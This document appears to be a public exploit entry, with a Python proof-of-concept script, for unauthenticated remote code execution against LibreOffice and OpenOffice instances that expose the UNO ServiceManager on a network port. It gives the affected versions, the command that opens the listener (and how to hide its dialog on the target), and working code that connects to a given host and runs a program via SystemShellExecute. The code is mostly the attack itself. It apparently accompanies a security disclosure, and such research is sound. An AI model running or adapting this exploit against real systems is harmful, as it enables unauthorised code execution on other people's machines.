Apache UNO API Remote Code Execution

`"""  
# Exploit Title: Apache UNO API RCE  
# Date: 2018-09-18  
# Exploit Author: sud0woodo  
# Vendor Homepage: https://www.apache.org/  
# Software Link: https://www.openoffice.org/api/  
# Version:  
  
LibreOffice Version: 6.1.2 / OpenOffice 4.1.6  
  
(but really any version with the UNO API included)  
# Tested on:  
  
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)  
  
Proof of Concept code attached as .txt file.  
  
HackDefense advisory:  
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/  
  
HackDefense blogpost:  
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/  
  
Unauthenticated RCE LibreOffice/OpenOffice with UNO API  
  
This code represents a small proof of concept of an unauthenticted remote code execution using  
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested  
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.  
  
For this PoC to work the target machine needs to run the ServiceManager using an external   
interface. The following command was used to test this PoC:  
  
[Ubuntu]  
Open a terminal and execute the following command:  
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'  
  
The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible  
flag to prevent the dialogbox from popping up on the target.  
  
I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:   
  
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/  
"""  
  
import uno  
from com.sun.star.system import XSystemShellExecute  
import argparse  
  
parser = argparse.ArgumentParser()  
parser.add_argument('--host', help='host to connect to', dest='host', required=True)  
parser.add_argument('--port', help='port to connect to', dest='port', required=True)  
  
args = parser.parse_args()  
# Define the UNO component  
localContext = uno.getComponentContext()  
  
# Define the resolver to use, this is used to connect with the API  
resolver = localContext.ServiceManager.createInstanceWithContext(  
"com.sun.star.bridge.UnoUrlResolver", localContext )  
  
# Connect with the provided host on the provided target port  
print("[+] Connecting to target...")  
context = resolver.resolve(  
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))  
  
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe  
service_manager = context.ServiceManager  
print("[+] Connected to {0}".format(args.host))  
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")  
shell_execute.execute("calc.exe", '',1)  
`